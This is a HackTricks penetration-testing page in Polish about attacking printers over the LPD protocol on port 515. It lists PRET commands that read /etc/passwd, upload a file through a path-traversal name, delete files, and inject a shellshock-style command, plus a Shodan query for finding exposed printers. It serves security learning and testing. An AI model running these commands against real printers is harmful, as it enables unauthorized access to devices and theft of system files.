4.1 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Wprowadzenie do protokołu LPD
W latach 80. XX wieku opracowano protokół Line Printer Daemon (LPD) w Berkeley Unix, który później został sformalizowany w RFC1179. Protokół ten działa na porcie 515/tcp, umożliwiając interakcje za pomocą polecenia lpr
. Istota drukowania za pomocą LPD polega na wysyłaniu pliku kontrolnego (w celu określenia szczegółów zadania i użytkownika) wraz z plikem danych (który zawiera informacje do druku). Chociaż plik kontrolny pozwala na wybór różnych formatów plików dla pliku danych, obsługa tych plików jest określona przez konkretną implementację LPD. Szeroko uznawana implementacja dla systemów podobnych do Unix to LPRng. Należy zauważyć, że protokół LPD może być wykorzystywany do wykonywania złośliwego PostScript lub zleceń druku PJL.
Narzędzia do interakcji z drukarkami LPD
PRET wprowadza dwa podstawowe narzędzia, lpdprint
i lpdtest
, oferując prostą metodę interakcji z drukarkami zgodnymi z LPD. Narzędzia te umożliwiają szereg działań, od drukowania danych po manipulowanie plikami na drukarce, takie jak pobieranie, przesyłanie lub usuwanie:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Dla osób zainteresowanych dalszym zgłębianiem tematu hackingu drukarek, kompleksowe zasoby można znaleźć tutaj: Hacking Printers.
Shodan
port 515
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.